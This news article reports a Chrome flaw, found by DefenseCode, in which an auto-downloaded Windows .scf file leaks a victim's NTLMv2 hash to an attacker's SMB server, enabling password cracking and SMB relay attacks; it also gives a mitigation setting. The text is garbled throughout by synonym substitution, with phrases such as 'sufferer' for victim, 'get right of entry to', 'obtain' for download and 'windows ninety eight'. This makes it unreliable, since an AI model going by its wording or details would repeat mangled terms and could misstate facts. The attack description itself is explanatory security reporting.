A vulnerability in Google’s Chrome browser allows hackers to automatically obtain a malicious file onto a sufferer’s pc which may be used to steal credentials and launch SMB relay attacks.
Bosko Stankovic, knowledge security engineer at DefenseCode, found the flaw within the default configuration of the latest model of Chrome operating on an up to date version of Microsoft’s windows 10 running device.
“at present, the attacker just must entice the victim (using totally up to date Google Chrome and windows) to discuss with his website to be able to proceed and reuse sufferer’s authentication credentials,” he wrote Monday in a description of the vulnerability.
The technique allows an attacker to achieve get right of entry to to a victim’s username and Microsoft LAN manager (NTLMv2) password hash. That leaves victims open to a lot of assaults including a Server Message Block (SMB) relay assault. A SMB relay assault lets in an adversary to use a sufferer’s credentials to authenticate to a laptop or network useful resource such as e mail or far off server.
attacks could additionally use this vulnerability to try and crack the goal’s hashed password.
DefenseCode said it did not notify Google of the vulnerability. When Threatpost asked Google to comment a spokesperson said “We’re aware of this and taking the vital moves.” Google didn’t intricate.
consistent with Stankovic the browser attack is simple.
First, a victim is enticed to click on on a in particular crafted hyperlink that triggers an computerized download of a home windows Explorer Shell Command File or SCF file (.scf) onto a victim’s computer. The file is automatically downloaded to the target’s C:users%Username%Downloads Folder.
as soon as the .SCF file is downloaded into the download directory it lays dormant. alternatively, as soon as the user opens the obtain directory folder in home windows, the SCF file tries to retrieve information associated with a home windows icon situated on the attacker’s server.
When the SCF file attempts to retrieve the faraway icon file information it current the attacker’s server with the victim’s username and hashed model of the sufferer’s password. If the victim is a component of a company network, the username and password is the network username and password assigned to the sufferer by means of the corporate’s gadget administrator. If the sufferer is a home consumer, the SCF file will request the icon data associated with the home user’s home windows username and password.
Researchers impartial of DefenseCode point out that the vulnerability isn’t completely tied to the way in which the Chrome browser handles SCF recordsdata, but in addition the way windows handles them as well.
in step with Stankovic, SCF information are lesser known file sorts going again so far as windows ninety eight the place it used to be primarily used as a “exhibit personal computer” shortcut. “it is basically a text file with sections that determine a command to be run (limited to operating Explorer and toggling personal computer) and an icon file place,” Stankovic said.
Researchers say this sort of attack could be used maliciously to attempt to crack the hashed password. The attacker may additionally use the credential request in a SMB relay assault. below that situation an attacker might forward the credential request to try access NTLM-enabled products and services on a company community – equivalent to e mail or community access.
“companies that permit remote get admission to to services similar to Microsoft exchange (Outlook anyplace) and use NTLM as authentication manner, is also susceptible to SMB relay assaults, permitting the attacker to impersonate the victim, getting access to knowledge and systems without having to crack the password,” Stankovic stated.
to give protection to in opposition to the attack in Google Chrome, DefenseCode recommends journeying Settings> show advanced settings> and take a look at the “Ask where to save lots of each file sooner than downloading” possibility.
“As with home windows shortcut LNK information, the icon place is routinely resolved when the file is shown in Explorer. atmosphere an icon location to a far flung SMB server is a identified attack vector that abuses the windows computerized authentication feature when getting access to products and services like far off file shares. however what’s the distinction between LNK and SCF from the assault standpoint? Chrome sanitizes LNK information by forcing a .obtain extension ever given that Stuxnet, however does not supply the same therapy to SCF recordsdata,” Stankovic wrote in his document.
Stankovic stated competing browsers Microsoft internet Explorer, area, Mozilla Firefox and Apple Safari each and every don’t enable the automated obtain of SCF information.